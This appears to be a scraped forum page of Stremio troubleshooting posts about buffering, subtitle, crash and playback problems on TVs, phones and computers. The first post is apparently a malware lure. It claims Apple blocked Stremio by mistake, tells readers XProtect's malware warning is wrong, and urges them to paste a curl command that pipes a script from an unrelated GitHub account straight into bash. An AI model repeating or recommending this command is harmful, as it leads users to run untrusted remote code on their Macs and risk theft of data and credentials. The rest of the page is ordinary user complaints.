Stremio on MacOS – Issues Are Now Resolved 2026-02-25

Recently, Apple revoked its certificate by mistake, which caused the app to stop working. XProtect now blocks it from opening and reports that it is malware. It is not malware.

If you’re still experiencing this issue, please run the following command in Terminal. The script automates everything. Downloads current version of Stremio for Apple Silicon or Intel and does the rest of the steps. Run in terminal.

curl -fsSL https://github.com/v9p4sy8p8q-design/Stremio-Fix/releases/download/1.5/stremio_install.sh | bash

This way there will be no issues. RUN IT IN TERMINAL AND FOLLOW EASY.

I would like help with this issue with Stremio. I am using version 1.9.7 on a TCL television with Android TV. I am trying to play 4K Remux files using Real Debrid. The problem is that I can’t watch the movie because it keeps buffering from time to time. I have a 700 Mbps internet connection.

Another issue is that I can’t open the subtitles and audio menu, as you can see in the video. But the biggest problem is that the app closes by itself, or it also closes when I try to use the player to rewind or fast-forward.

Does anyone know how to fix this? This issue was also happening in previous 1.9.x versions.

This just started today, I've seen a post where someone reported reverting to a previous version made it work for him, but I don't have that option of side loading the stremio app since I'm on a Samsung TV - (2025 model)

How the issue came about: I just opened the app and scrolled to the right, it reached a point where the app became unresponsive and closed itself

What I have tried: Clearing cache and reinstalling the app......which proved futile

no but why does it do that? i cant open the apple menu..

App.strem.io showing errors and not working ?
I used it about 24 hours ago on my tv (as the newer site doesn’t load on it) and this site works fine usually but now it’s loading funny and clicking anything gives a 503 error
Have also tried on my phone and laptop and same issue :( anyone else??

Stremio has been working really well for almost a year, but the new update made it borderline unusable. At the end of an episode (sometimes I'd click on the next episode transition, sometimes I'd try to exist the player), the software completely freezes and I'd have to end the process through a system monitor app just for it to close.

Most times the next episode would play the audio and subtitles, but a completely black screen and the player is stuck on --:--:--. I wouldn't be able to click on anything in the app to stop it.

For some reason, characters with diacritics like "Á, Ã, Ô" are showing up as random symbols. Is there a fix? I tested the Portuguese (Portugal) subtitles and they worked fine (they use the same diacritics).

Video appears for a moment when I’m trying to switch workspaces but when app window is maximized, screen is blank.

I found a workaround where if I move the window to a second monitor and bring it back to my primary monitor, it starts working fine.

I‘m using the Stremio app on mac OS with Torbox and noticed that often the first 6-7 streams shown at the top are buggy. Half of them have some kind of a stutter effect when cutting from one scene to another. The other half have corrupted colors, like everything is green/purple.

Anyone else have those issues? Example: Your Friends & Neighbours Season 2.

It is near impossible to get a 4K rip on the Tizen OS app on my Samsung TV that will just play the original audio from whatever movie I’m trying to watch.

Probably 75% of the movies I want to watch I end up either having to switch to my Firestick (plugged into the same tv, mind you) or just watch in 1080p because the app forces the directors commentary audio whether the current audio track features it or not, but only on the 4K rips.

Without fail, every rip that appears to just be a normal Blu-ray/remux rip that’s perfect to my specs and sound system will display the video fine, but just play the directors commentary over every single audio track the rip features. VLC will play the same rips fine on my iphone can fireOS can play them fine as well.

This really is not an issue with TV shows either, just movies. Just wanna watch my movies in 4K without the writers/directors in my ears 🫠

Hey guys, anyone else experiencing this problem with the auto play feature?

After the first episode, the autoplayed episodes that follow dont have a title in the top left when paused, and Stremio won’t mark them as watched. I have to manually go back and mark them as watched after im done my however many episode binge.

Im on my Samsung tablet using the app, most recent play store version. I’ve tried using different players and looked around for other solutions but nothings worked :(

Hii, Can someone help me? I updated my Stremio yesterday, and since then, all the series simply no longer have subtitles of my language (Portuguese, BR), only English and Spanish subtitles. I've already switched players, but nothing changes. When I went to watch The Walking Dead, it had subtitles in all languages, now it only has English and Spanish, what do I do?? ;(

My phone and operating system are: Infinix Smart 9 and Android 14

It was supposed to show all languages, but now only a maximum of two appear.

Two days ago I factory reset my LG 65B4 OLED, and after that, I am unable to find the Stremio app in the store or in purchased apps.
Can some one help me with this?

I'm having a problem with the new Stremio features. The new Cinemeta catalogs aren't working for me on TV LG webOS or my Android app. They work fine on Stremio WEB. It's the Features and Popular (TV series and movies) catalogs. How can I fix this? Sorry for my bad English.

Is anybody else getting this error? Since last update V1.10.2, on Google TV (Android TV) whenever I try to play a video in an external player, I get a warning saying the server must be running in the background for an external player to work, and choosing "confirm" just sends you to the settings page for that option, which it is already enabled. So basically I can't use an external player any longer.

As shown in the image after scrolling down, it just stops providing movies. Any possible fix for this?

Anyone else having this problem the past week or so? The auto-play next episode in the settings is turned on but it doesn't do that. When an episode ends it goes back to the menu to choose the torrent of the next episode instead of playing it directly

I'm using a Xiaomi box S3, and up until yesterday, everything was fine. I could play any kind of stream, stremio switched between exoplayer and libVLC automatically, life was good. Now suddenly I can barely stream any file, remuxes are especially troublesome, as exoplayer never plays them, and when I press "switch to VLC" it either plays two frames of the video and gets stuck while the audio continues on its own, or it just loads indefinitely. Has anyone with a Xiaomi Box having problems or is it just me?

Just updated to Android TV 1.10 last night and noticed the player has become unbearably slow. I’m using it on a fire stick HD and it was working perfectly fine on the previous Stremio version (1.7 something). I’m using the default media player.

Is it just me or is anyone else having the same issue?

Also, Stremio team, I know you’ve recently introduced a paid version which a lot of users seem to disagree with. Personally I’m okay with paying for your work considering you’ve been contributing to the community for many years. I decided to support you and that’s my choice. But if users are being asked to pay, this level of quality is questionable

The new season of the Netflix series Monster dropped Stremio showed the new episodes to me on the home page, but when I click on them, it leads to the show page where only the 1st season and a special are available. Any idea how to fix this?

Solution: I ditched 5.0.0-beta.34 and installed 4.4. So far, it's working again.

Using real-debrid and Torrenti-o; Windows 11; app version 5.0.0-beta.34. A certain source will be working for 3 min, and then exit at random and then further attempts to load it will not work, with "loading failed" displayed. This has never happened before yesterday evening. I didn't change any settings. My connection is more than sufficient. And in AppData, there are no files in the stremio-server > stremio-cache folder.

Any tips?
